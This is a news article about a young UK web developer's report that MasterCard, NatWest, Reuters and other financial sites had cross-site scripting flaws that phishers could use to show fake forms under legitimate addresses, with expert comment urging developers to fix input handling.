Leading financial institutions have adopted a more aggressive attitude toward online identity theft cons known as "phishing scams" in recent months. But companies, including MasterCard International, may be unwittingly helping phishers trick online shoppers, says a new report from a UK web developer.
A test of leading financial services websites, including sites run by MasterCard, NatWest and Reuters Group revealed that many sites have loosely protected features that scam artists can use to mask their own malicious websites, hijacking the name and web address of established institutions, says Sam Greenhalgh, who is 19 and operates the website Zapthedingbat.com.
The security lapses at major financial sites Greenhalgh has identified are not caused by flawed Microsoft products. Indeed, the trick works with most popular web browsers. Instead, poorly designed and insecure features on leading websites that contain "cross-site scripting" vulnerabilities are to blame, he says.
Greenhalgh uses the example of an "ATM Locator" feature on MasterCard's website. The ATM Locator was designed to help MasterCard holders locate cash machines that accept MasterCard. Users input a location, including a country and street address, and the website provides the location of cash machines in the area.
However, because of a cross-site scripting vulnerability in the feature, Greenhalgh was able to inject his own HTML into the fields used by the ATM Locator, causing the mastercard.com site to display his content, including a mock form that could be used to harvest information.
With the web browser address bar reading "http://www.mastercard.com" and the MasterCard logo adorning the page, even sophisticated web surfers would be hard put to prove that they were not interacting with the credit card company instead of scam artists, Greenhalgh says.
"The danger for Joe Public is in increasing his susceptibility," Greenhalgh says. "Phishing attacks have been around a long time and usually they're very easy to spot – you can look in the address bar and see you're not at mastercard.com. But these flaws allow phishers to actually use the legitimate site. As a user, it's very hard to tell," he says.
The cross-site scripting vulnerability is an old exploit that has been around for a long time, but hasn't yet been exploited by scam artists, says Dave Kurzynski, chief technology officer of Internet brand protection firm NameProtect.
Still, the vulnerability could become more common as "low hanging fruit" and easier avenues to trick consumers are closed to scammers, he says.
Greenhalgh's website notes similar flaws in seven other sites, including attacks on search features at reuters.com, Internet payment service WorldPay and NatWest. NatWest did not immediately respond to a request for comment. MasterCard declined to comment for this article.
Shoddy coding by Web developers is mostly responsible, but the companies are also to blame, Greenhalgh says.
"I think it's a matter of the attitude that both developers and their employers have to their product and the quality of service that they are giving to customers. Quality of service is not just a factor of what the customer perceives. It's a whole package."
Companies from across industries should be looking at their websites and web-based applications carefully with cross-site scripting vulnerabilties in mind, Kurzynski says.
"Any website that accepts text input and displays it is possibly vulnerable. Any newly written application should be designed with this in mind and legacy applications in use since this exploit was discovered need to be changed to protect against it," he says.
Web search features are a common source of cross-site scripting flaws, especially those that echo back the requested search word or phrase to users, Greenhalgh says.
"In effect what I am doing is using something that is designed to trust user input too much," he says.